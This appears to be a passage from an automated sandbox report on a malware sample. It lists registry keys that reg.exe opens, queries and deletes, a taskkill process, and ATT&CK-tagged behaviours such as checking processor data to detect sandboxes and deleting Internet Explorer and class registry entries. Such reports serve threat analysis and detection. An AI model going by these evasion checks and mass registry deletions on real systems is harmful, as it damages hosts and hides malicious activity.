Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Device Parameters\Storport	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Device Parameters	reg.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Device Parameters	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Device Parameters	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000	reg.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Device Parameters	reg.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000	reg.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK	reg.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Device Parameters	reg.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Storport	reg.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	reg.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Device Parameters	reg.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002	reg.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties	reg.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters	reg.exe

Checks processor information in registry 2 TTPs 10 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

reg.exe

description	ioc	process
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1	reg.exe
Key deleted	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1	reg.exe
Key deleted	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor	reg.exe
Key enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	reg.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	reg.exe
Key deleted	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	reg.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1	reg.exe

Enumerates system info in registry 2 TTPs 64 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

reg.exe

description	ioc	process
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\2	reg.exe
Key enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController	reg.exe
Key enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral\0	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral	reg.exe
Key deleted	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses\PCIBus\0000	reg.exe
Key enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0	reg.exe
Key deleted	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses\PCIBus	reg.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor	reg.exe
Key deleted	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController	reg.exe
Key deleted	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses\PCIBus\0000	reg.exe
Key deleted	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor\0	reg.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0	reg.exe
Key deleted	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0	reg.exe
Key deleted	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor\1	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0	reg.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral	reg.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor\0	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0	reg.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0	reg.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses	reg.exe
Key enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0	reg.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController	reg.exe
Key deleted	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses	reg.exe
Key deleted	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0	reg.exe
Key deleted	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\1	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor\1	reg.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter	reg.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0	reg.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses	reg.exe
Key enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses\PCIBus	reg.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor\1	reg.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral	reg.exe
Key deleted	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral\0	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\1	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses\PCIBus	reg.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses\PCIBus\0000	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor	reg.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral	reg.exe
Key deleted	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController	reg.exe
Key deleted	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\2	reg.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses\PCIBus	reg.exe
Key deleted	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor	reg.exe
Key enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController	reg.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController	reg.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral\0	reg.exe
Key enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses	reg.exe
Key enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor	reg.exe
Key enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0	reg.exe
Key enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0	reg.exe
Key deleted	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\2	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor\0	reg.exe
Key deleted	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral	reg.exe
Key enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0	reg.exe

Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

216 taskkill.exe

pid	process
216	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 64 IoCs

adware spyware

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\Restriction Policies\Hashes\487B786451026BAEFD474B8758C058D538EC35CB	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{38F03426-E83B-4E68-B65B-DCAE73304838}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{81361155-FAF9-11D3-B0D3-00C04F612FF1}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{991DA7E5-953F-435B-BE5E-B92A05EDFC42}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{FA7C375B-66A7-4280-879D-FD459C84BB02}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7AC06A6F-4C88-4707-8DEC-61017CB50E1E}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\RunDLl32Policy\cnmsm5x.dll	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{f5078f21-c551-11d3-89b9-0000f81fe221}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{9E797ED0-5253-4243-A9B7-BD06C58F8EF3}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Extension Compatibility\{C08DF07A-3E49-4E25-9AB0-D3882835F153}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{0F1BE7F7-45CA-11D2-831F-00A0244D2298}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{314111B8-A502-11D2-BBCA-00C04F8EC294}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SYNC_SETTINGS	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Extension Compatibility\{724D43A0-0D85-11D4-9908-00400523E39A}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Extension Compatibility\{A968A4B4-C492-4834-B651-17602C3885C8}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{B0A08D67-9464-4E73-A549-2CC208AC60D3}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\NOTIFYDOWNLOADCOMPLETE	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Plugins\PluginsPageFriendlyName	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\Restriction Policies\Hashes\6D3BC8D0F5F3DAA9BF40880FD115FE497F2C4AA1	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{37B03544-A4C8-11D2-B634-00C04F79498E}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{7849596a-48ea-486e-8937-a2a3009f31a9}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_DEBUGGER	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{B0A6BAE2-AAF0-11D0-A152-00A0C908DB96}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{0F6A72B9-D3C5-4FCE-89A3-4E3D19C3580A}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{B9C13CD0-5A97-4C6B-8A50-7638020E2462}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{E94137E0-92ED-4579-9251-18AF2A08CCD1}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{03cb9467-fd9d-42a8-82f9-8615b4223e6e}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{0713E8A2-850A-101B-AFC0-4210102A8DA7}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{860bb310-5d01-11d0-bd3b-00a0c911ce86}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{C8F209F8-480E-454C-94A4-5392D88EBA0F}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{D4A97620-8E8F-11CF-93CD-00AA00C08FDF}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Extension Compatibility\{22BF413B-C6D2-4D91-82A9-A0F997BA588C}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\Restriction Policies\Hashes\AC343CECCF835E2FEF435465263770412B7573B4	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{01002B17-5D93-4551-81E4-831FEF780A53}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{0006f02a-0000-0000-c000-000000000046}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Extension Compatibility\{8DCB7100-DF86-4384-8842-8FA844297B3F}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{d99f7670-7f1a-11ce-be57-00aa0051fe20}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\UnattendBackup\DisableDataExecutionPrevention	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{025B1052-CB0B-11CF-A071-00A0C9A06E05}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{510a4910-7f1c-11ce-be57-00aa0051fe20}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{AED98630-0251-4E83-917D-43A23D66D507}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\AdvancedOptions\JAVA_VM\CONSOLE	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\RunDLl32Policy\cnmsm53.dll	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{CC7E636D-39AA-49b6-B511-65413DA137A1}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{5740A302-EF0B-45CE-BF3B-4470A14A8980}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{A80D199B-CFDD-4DA4-8C47-2310D5B8DD97}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{18ab439e-fcf4-40d4-90da-f79baa3b0655}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\ULINKS\ALWAYS	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{00020420-0000-0000-c000-000000000046}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{FF2BBC4A-6881-4294-BE0C-17535B1FCCFA}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Extension Compatibility\{179E4A98-A3C4-407D-8C66-E63B67BB6F4A}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Extension Compatibility\{DA986D7D-CCAF-47B2-84FE-BFA1549BEBF9}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{3050F4F5-98B5-11CF-BB82-00AA00BDCE0B}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{B26E6120-DD35-4BEA-B1E3-E75F546EBF2A}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Extension Compatibility\{472734EA-242A-422B-ADF8-83D1E48CC825}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Extension Compatibility\{5A074B21-F830-49DE-A31B-5BB9D7F6B407}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_WEBOC_MOVESIZECHILD	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{C5702CCD-9B79-11D3-B654-00C04F79498E}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{4faab301-cef6-477c-9f58-f601039e9b78}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\CRYPTO\TLS1.0	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{0006f02a-0000-0000-c000-000000000046}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\NavigatorPluginsList	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{208DD6A3-E12B-4755-9607-2E39EF84CFC5}	reg.exe

Modifies registry class 64 IoCs

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Record\{C888351B-5DFD-3A9F-8D36-96E7770D0EBF}\4.0.0.0	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{F7F63240-3F54-4B38-8E8C-7409E5252ADD}\ProxyStubClsid32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0018-0000-0385-ABCDEFFEDCBC}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\OfficeTheme\CLSID	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{092A1E21-9379-4B9B-AD31-D5FEE2F748C6}\ProxyStubClsid32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0018-0000-0065-ABCDEFFEDCBC}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\PackageRepository\Extensions\windows.fileTypeAssociation\.adt	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\VBEFile\ShellEx	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{000C031F-0000-0000-C000-000000000046}\TypeLib	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00000051-0000-0010-8000-00AA006D2EA4}\TypeLib	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Record\{A921AF37-36D9-30D1-9ABB-FE255AAA60AE}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\JavaPlugin.114012\CLSID	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{87D5F036-FAC3-4390-A1E8-DFA8A62C09E7}\1.0\0\win32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{7B076AD1-BD51-11D2-9238-00A02448799A}\ProxyStubClsid32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\acrobat\shell\open\ddeexec	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3050F2D3-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Record\{61D328E9-E23E-3D50-9618-6CE4D3BFFFB5}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Record\{B49EF72B-EE56-3A93-ACA1-0C9508CDBEDB}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{550D0110-8DCD-11D1-8524-00A02495E426}\VersionIndependentProgID	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{CBC361D2-B7A6-4FEB-A237-35CC98300A4A}\ProxyStubClsid32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0009-ABCDEFFEDCBC}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0018-0000-0298-ABCDEFFEDCBC}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{31AC3F11-E5EA-4A85-8A3D-8E095A39C27B}\NumMethods	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{796A2C2D-5B11-4FB5-9077-56D5E674972B}\ProxyStubClsid32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{000209F4-0000-0000-C000-000000000046}\LocalServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0216-ABCDEFFEDCBB}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0376-ABCDEFFEDCBA}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00020832-0000-0000-C000-000000000046}\DataFormats\DefaultFile	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00024707-0000-0000-C000-000000000046}	reg.exe
